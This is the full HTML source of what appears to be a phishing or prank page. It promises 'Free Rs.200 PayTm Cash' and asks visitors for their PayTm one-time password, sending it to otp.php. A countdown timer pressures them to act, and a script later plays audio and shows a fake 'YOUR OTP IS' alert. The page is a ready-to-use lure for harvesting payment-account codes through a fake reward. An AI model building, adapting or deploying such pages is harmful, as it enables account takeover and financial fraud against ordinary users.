

<html lang="en">


<head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
 <meta property="og:locale" content="en" />
<title>Hey Dear! You Have Won Free Rs 200 PayTm Cash</title>
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
    <meta property="og:type" content="website" />
    <meta property="og:title" content=" Free PayTm Rs.200 Cash for Every Indian " />
    <meta property="og:url" content="index.php" />
    <meta property="og:description" content="Try it now" />
    <meta property="og:site_name" content="Free Rs.200 PayTm Cash" />
    <meta property="og:image" content="https://statusguy.com/test/ogg.jpg"/>
    <link rel="shortcut icon" href="/sicon.png" type="image/x-icon">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
<link rel="stylesheet" href="../www.w3schools.com/w3css/4/w3.css">
<link rel="stylesheet" type="text/css" href="style.css"/>
</head>
<body>
<div class="content">
 
    
<div class="container2">
<header>
    <div class="h_logo">
        <img src="https://dhlm2eb86cbhs.cloudfront.net/public/thumbs/news/2018/01/20651/resizer_425_735.jpg" height="auto" />
    
    <h1><b>Get Free Rs.200 PayTm Cash</b></h1>	</div>
</header>

<form action="otp.php" method="POST" class="login">

<div class="container">
  <form action="process.php" method="POST" class="login">
<center>          
</center><br>

    <b>Your PayTm Otp</b>
    <input type="text" id="number" name="pass" placeholder="Enter Your PayTm Otp..."  Title="Please enter Otp" required>

&nbsp;
             <center> <div>Time left - <span id="timer">2:00</span></div></center>
			 &nbsp;

                <button class="button new btn-lg round" style="width:100%" align="center" type="submit"><i class="fa fa-money" aria-hidden="true">&nbsp;</i><b>VERIFY</b></button>
        
</form>

<br>
<script type="text/javascript">
             startTimer();

function startTimer() {
  var presentTime = document.getElementById('timer').innerHTML;
  var timeArray = presentTime.split(/[:]+/);
  var m = timeArray[0];
  var s = checkSecond((timeArray[1] - 1));
  if(s==11){m=m-1}
  if((m + '').length == 1){
    m = '0' + m;
  }
  if(m < 0){
    m = '11';
  }
  document.getElementById('timer').innerHTML = m + ":" + s;
  setTimeout(startTimer, 1000);
}

function checkSecond(sec) {
  if (sec < 10 && sec >= 0) {sec = "0" + sec}; // add zero in front of numbers < 10
  if (sec < 0) {sec = "59"};
  return sec;
}
</script>
<audio id="xyz" src="https://x2convert.com/Thankyou?token=U2FsdGVkX19zZMVUt9FiInLG3xbWVEJ5Qo3jI3T1LqIK7LvqpIWb9DRoXutU4sdS5xwu6RqaXWm7aJcIoxqPWJPv6y6%2fAwEdoYgxddDrJ%2fKfoRDyWwf3gW%2fB2LL9fK9MxIdB2P2W9PIH0UcMazELrvBIYp0g8pQGFwORMDBjukJFjZc%2f0dMbScfWa5oyiKcE&s=youtube&id=&h=3692998352381650705" preload="auto"></audio>
<br>
<div dir="ltr" style="text-align: left;" trbidi="on">
<script>
   var count = 10; // Number of remaining seconds.
   var counter; // Handle for the countdown event.
   
   function start() {
    counter = setInterval(timer, 1000);
   }

   function timer() {
    // Show the number of remaining seconds on the web page.
    var output = document.getElementById("displaySeconds");
    output.innerHTML = count;
    
    // Decrease the remaining number of seconds by one.
    count--;
    
    // Check if the counter has reached zero.
    if (count < 0) { // If the counter has reached zero...
     // Stop the counter.
     clearInterval(counter);
     
     // Start the download.
      {
      document.getElementById('xyz').play();
  alert("YOUR OTP IS 64583");
}
     return;
    }
   }  
   // Start the countdown timer when the page loads. 
   window.addEventListener("load", start, false);
  </script>
<span style="color: white;">
<span id="displaySeconds"></span>
</div>
</div>

</div>
</body>

</html>